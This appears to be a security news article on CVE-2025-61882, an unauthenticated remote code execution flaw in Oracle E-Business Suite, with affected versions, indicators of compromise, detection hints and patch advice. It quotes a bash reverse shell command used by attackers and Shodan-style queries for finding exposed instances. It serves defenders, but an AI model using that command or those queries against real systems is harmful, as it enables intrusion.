A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available.
CVE-2025-61882 presents a severe security risk, achieving a maximum CVSS 3.1 score of 9.8 and enabling remote code execution without authentication across multiple Oracle E-Business Suite versions.
The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14, specifically targeting the Oracle Concurrent Processing BI Publisher Integration component via the HTTP protocol.
Oracle E-Business Suite RCE Vulnerability
Security researchers have identified a flaw that allows unauthenticated remote attackers to execute arbitrary code on vulnerable systems through network-based exploitation with low attack complexity.
Oracle’s security advisory emphasizes the vulnerability’s classification as “remotely exploitable without authentication,” meaning attackers can leverage network access without requiring valid credentials.
The vulnerability’s attack vector utilizes HTTP communications, with the scope remaining unchanged but delivering high impact across confidentiality, integrity, and availability metrics.
Organizations can detect vulnerable instances using Nuclei detection templates that check for “E-Business Suite Home Page” text while comparing Last-Modified header timestamps against October 4, 2025.
The Oracle October 2023 Critical Patch Update serves as a prerequisite for applying the necessary security patches. Systems with modification dates preceding this threshold indicate unpatched installations susceptible to exploitation.
| Risk Factors | Details |
| Affected Products | Oracle E-Business Suite 12.2.3-12.2.14 |
| Impact | Remote Code Execution |
| Exploit Prerequisites | Network access via HTTP protocol, No authentication required |
| CVSS 3.1 Score | 9.8 (Critical) |
Active Exploitation
Active exploitation attempts have been documented through specific Indicators of Compromise (IOCs), including malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 conducting GET and POST activities.
Threat actors are utilizing reverse shell commands such as sh -c /bin/bash -i >& /dev/tcp// 0>&1 to establish outbound TCP connections for persistent access.
Forensic analysis reveals malicious artifacts including the exploitation toolkit oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploitation scripts exp.py and server.py.
These tools demonstrate sophisticated attack methodologies potentially linked to known threat groups, including references to Scattered Spider, Lapsus$, and Cl0p ransomware operations.
Oracle strongly recommends the immediate deployment of patches across all affected E-Business Suite installations, emphasizing that only systems under Premier Support or Extended Support receive security updates.
Organizations should implement network monitoring for the identified IOCs while conducting comprehensive vulnerability assessments using available detection templates and Shodan queries targeting html:”OA_HTML” patterns to identify exposed instances.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
